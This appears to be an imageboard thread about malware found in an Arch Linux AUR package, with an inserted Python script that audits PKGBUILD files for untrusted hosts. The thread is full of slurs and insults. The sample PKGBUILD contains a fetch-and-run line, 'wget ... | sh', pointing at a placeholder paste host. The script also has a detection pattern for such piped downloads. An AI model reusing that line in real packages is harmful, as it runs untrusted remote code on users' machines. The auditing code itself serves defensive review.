Arch Linux AUR Repository Found to Contain Malware

>The Arch Linux user-maintained software repository called AUR has been found to host malware. The discovery was made after a change in one of the package installation instructions was made. This is yet another incident that showcases that Linux users should not explicitly trust user-controlled repositories.

sensorstechforum.com/arch-linux-aur-repository-found-contain-malware/

HAHAHAHAHAHAHAHAHAH! ARCHFATS ON SUICIDE WATCH!

Meh. I've been saying this for years: Arch is just a meme.

This is widely known, even the Wiki says to carefully inspect the things you get from the AUR. Bigger AUR packages are safe though. It's really the packages from the bottom that you gotta look out for.

Packages can be provided by anyone which is why you check that URLs in the PKGBUILD file match the official sources before running it.

I thought linux is immune to viruses?

The AUR isn't maintained by arch developers. They are user created install scripts.

Arch is a fucking shitshow.
Most anons who talk about it being minimalist don't even know how the packages and dependencies in there work hence why they think it's "small".
Only meme masters trying to join some sort of PC masterrace subgroup and weeb NEETs use it.

That is an oversimplification. There is no reason malicious software can't be made for Linux systems. AUR is literally the equivalent of running random .bat and .exe files from the internet.

The fact it was found and publicly announced is more reason to use it as it's proven that it is in fact checked. Only a retard would blindly install packages without first quickly checking anyway.

It's better to use something with a flaw that's been fixed so you know what happens when shit goes down rather than something that can pretend to be perfect.

not all malware are viruses, virus is just a kind in the group
also there are viruses for linux, but they are very hard to run and not to notice, unless you are not a brainlet running your everyday desktop with root

Arch fags BTFO! AUR = Arch malware repository

Just a threadly reminder.

I don't use arch but they fucking warn you on the front page. I'm literally drowning in summerfag tier threads and posts

Haiku got uneditable, signed packages with easily cross-checkable recipes for most of the stuffs, you guys cucking yourselves.

>Martin graduated with a degree in Publishing from Sofia University. As a cyber security enthusiast he enjoys writing about the latest threats and mechanisms of intrusion.

*snap*


Anyway, who the fuck doesn't check the PKGBUILDs.
I literally have my own package manager for AUR written in bash and I'm a fucking welder.

aur is a meme and only a fool would take it seriously

>using aur for pkgbuilds
>not just compiling it yourself

nobody that actually knows what they are talking about has ever said that linux doesn't get viruses.

Based OpenBSD poster

Lmao, poor archfags. That's why I stick with windows 10

im not afraid to admit that i am not on that level of knowledge where i am able to clone software from git and compile it myself (maybe i am but i don't feel need to do so).

most of software i use are in main repos

It wasn't a virus, it was a shell script that wgets another shell script from Pastebin, which wgets another. Whoever did it was a retard, so I'm guessing it was somebody here.

Only non-users and retards ever took the minimalist thing to mean small, as in size. It's always meant "minimal" as in, the devs leave packages as they come from upstream. Faggot ricers were the illiterate cancer who pushed the crap you're talking about.

i bet you couldn't even install it

>Lmao, poor archfags.
You surely mean the probable 3-4 people who actually were pleb enough to install an Adobe reader application.

>that's why i stick with an os which has a million times more malware

dumb boomerposter

cringe

Actually what's in the aur is plain text scripts for downloading and building packages. Just read the fucking things. exe's are binary blobs.

Im sorry for bullying you user-kun

>open source contribution community
>everyone giving in programs they want
well no shit there's gonna be some forms of malware, but that doesn't mean it's all bad. install common sense 2012 pro
not all malware is viruses, and nothing is "immune" to getting cracked. it's the same mentality people have when people say "macs are immune to viruses".
people use arch because they want the customization of gentoo but don't like either A) installing gentoo, or B) compiling everything from source.
cuck
i bet you think ubuntu is a respectable distro

what more customisation do you get out of arch than you do out of a minimal ubuntu installation?

AUR has nothing to do with Arch linux

it's packages by users for users

Arch Devs only support the official repos, learn the difference

what distro is that

Really depends what you pick from the AUR faggot
All you have to do is choose, your complaint is invalid

Minimal ubuntu is just barebones Debian, baka at your comment

blowfish os

better package selection/optimization

the average ubuntu user

>bloated packages are good

ok then
what more customisation do you get out of arch than you do out of a minimal debian installation?

i don't know what you mean.
ubuntu splits packages into smaller pieces, such as including dev headers etc. in separate packages
if anything, arch allows less customisation
what do you mean by optimisation? arch is no better optimised than ubuntu

You realize Arch packages are every bit as bloated (even moreso actually) than Ubuntu ones right? They try to include support for every build option that's reasonable to support as well as including the development headers (which Ubuntu splits)

ahmed?

>Archtards defending their linux abortion package manager.

>The investigation reveals that the executed scripts included a data harvesting component that retrieves the following information:
> Machine ID
> The output of uname
> CPU Information
> Pacman (package management utility) Information
> The output of systemctl list-units
What's the point??

>aur.archlinux.org/packages/acroread/
> The script, however, contains a typo (calling $uploader when the function was actually upload()) so shouldn't actually do anything.
It's literally a fucking kid

Breaking news, Arch is shit.

theres documents that can only be opened in acroread. see the horror yourself here.
txdot.gov/inside-txdot/forms-publications/forms/requested-forms.html

I fell for this fuckin meme, ive installed it as main OS, i want to kms, should i return to debian? Fuck ive tried to install it, but it doesnt detect the usb drive, ("cdrom")

I recently left it for Opensuse because I got sick of everything breaking. hey you are was the only reason I used it and that was because it let me get game emulators and roguelikes easily until I found out that much of the community does a bad job packaging them anyway.

>muh updates

bleeding edge distros are a disaster

rolling release distros aren't better

TOP KEK

your post is completely unrelated

what a surprise

If you installed Acrobat Reader in the first place, you're probably retarded.

How do you check for viruses/malware in packages then? Do you use software to scan it like with Windows? I've only been using Linux a couple months and distros where I don't have to worry about this kinda thing at that.

I always read the entire pkgbuild and verify that the source points at the right upstream. Found one today that had a different upstream actually but it turns out it just redirects to the real upstream (mosh-git btw)
I never trust AUR. It's just a tool and allows me to be lazy.
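
The check described in the post above (read the PKGBUILD, confirm the sources point at the real upstream) and the download-and-run chain mentioned earlier in the thread, as an added example that is not part of the original thread. The sample PKGBUILD, the `example.org`/`example.net` hosts and the function names are constructed for illustration; the file is scanned as text and never sourced, since sourcing a PKGBUILD runs it.

```python
import re
from urllib.parse import urlparse

# URLs stop at quotes, brackets and shell operators so "url|sh" splits correctly.
URL_RE = re.compile(r"""https?://[^\s'"()<>|;&]+""")
# Fetched content piped into a shell, or run through eval/source "$(curl ...)".
FETCH_EXEC_RE = re.compile(
    r"\b(?:curl|wget)\b[^\n|]*\|\s*(?:sudo\s+)?(?:ba|z|da)?sh\b"
    r"|\b(?:eval|source)\b[^\n]*\$\((?:curl|wget)\b"
)


def host_trusted(host, trusted_hosts):
    """True if host equals a trusted name or is a subdomain of one."""
    return any(host == t or host.endswith("." + t) for t in trusted_hosts)


def audit_pkgbuild(text, trusted_hosts):
    """Scan PKGBUILD text without sourcing it; return (line, kind, detail) tuples."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        stripped = line.strip()
        if not stripped or stripped.startswith("#"):
            continue
        for url in URL_RE.findall(stripped):
            host = urlparse(url).hostname or ""
            if not host_trusted(host, trusted_hosts):
                findings.append((lineno, "untrusted-host", host))
        if FETCH_EXEC_RE.search(stripped):
            findings.append((lineno, "fetch-and-exec", stripped))
    return findings


# Constructed sample: a plausible PKGBUILD with one line added to package().
SAMPLE = """\
pkgname=exampletool
pkgver=1.2.3
url="https://exampletool.example.org"
source=("https://downloads.example.org/exampletool-$pkgver.tar.gz")
package() {
  install -Dm755 exampletool "$pkgdir/usr/bin/exampletool"
  wget -qO- https://paste.example.net/raw/abc | sh
}
"""

if __name__ == "__main__":
    # Assumption: the reviewer knows the real upstream publishes under example.org.
    for finding in audit_pkgbuild(SAMPLE, {"example.org"}):
        print(finding)
```

A text scan only narrows down what to read: a source URL that redirects elsewhere, like the one the post mentions, and anything in a separate `.install` file still need a manual look.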

for you

I always see a fat man when I look at that logo now.

/thread

just read each PKGBUILD before installing anything, I guess this is too hard for manjaro retards though

Minimal ubuntu is buggy garbage same as debian
NEVER NOT make use of the provided live cds

Hahaha Archfaggots going on about their superiority BTFO

I always see a fucking pedo faggot cocksucker attention whore when I look at dumb animeposter.

back 2 plebbit newfag

Yeah, it's called systemD.

it is always summer here

t. animeposter

nobody makes malware for linux because nobody worth infecting uses linux
it's all neckbeards running anime apps and thinking they're leet hackers because they typed words into a black window instead of clicking things with their mouse

this

But everyone knows this, it is literally a user-operated repository. Anyone could upload a virus if they wanted to, you download things as carefully as you would anywhere else. How dumb are you ?

>nobody worth infecting uses linux

Attached: operating-system-servers-market-share-linux-windows-computers.jpg (1040x1040, 741K)

i'm still mad at freenas for going with freebsd instead of debian or anything that's from linux

If digits then gonna install openbsd

IT'S OVER
INSTALLING WINDOWS RIGHT NOW

>using aur for pkgbuilds
>not just compiling it yourself
Hey, someone wrote a script that spits out a pacman package that you can manage like any other software. Why not use it?